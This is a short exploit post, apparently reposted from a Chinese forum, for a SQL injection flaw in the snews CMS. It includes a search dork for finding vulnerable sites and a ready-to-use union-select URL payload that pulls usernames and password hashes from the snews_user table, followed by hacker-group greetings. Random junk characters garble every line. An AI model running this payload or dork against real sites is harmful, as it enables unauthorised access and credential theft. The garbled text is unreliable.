标题: CMS snews SQL Injection Vulnerability: r) ?2 A- H6 V7 L
作者: By onestree
2 o, f1 [. t3 T* X8 M下载地址 : http://snewscms.com/, f2 i; t+ V* E$ h
测试平台 : ubuntu 12.10 / win 7" Q6 f) s1 J" W4 X
关键词: inurl:"tanyakan pada rumput yang bergoyang"
! Q) P, ]6 l; W D
: F( w0 l3 z: V9 @2 R' V
& x6 x& @( y4 K3 f*************************************************************
7 x! z2 f- _, T, w4 Q
! A' M# y3 [% \ u" }SQL poc:# ?* @( O1 J9 \ |
; @ ~* N% @9 v5 Q) {. S& s/ u/ S
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
# l" S; J/ P7 U' g' T) F; o9 R
/ K- d- c H6 i, g" E示例7 s4 `0 \( X, O% s( ` g5 M# N7 N
$ H ] n' y6 K- G* k6 t, ~4 J
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
. S# _ C5 r& T3 ~; Y1 X
5 R/ L0 N; `( F' h. K: z
$ t+ Q+ f# n$ K致谢:
. g6 Z& ?0 _; q + q" {- @: e' M$ q* C' n' w
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
3 N7 S9 F6 z/ Z0 m. F- Y! [9 ]% s/ a " f v9 J4 `" A) K
indonesiancoder - moeslimh4x0r - go-coder
* C* o6 |" K% p5 K+ w# f 4 r" f9 {2 @) I3 Z8 G& T$ h
spesial my hunny :*
5 T: W/ X" |/ W) {- A2 `, o) I4 a |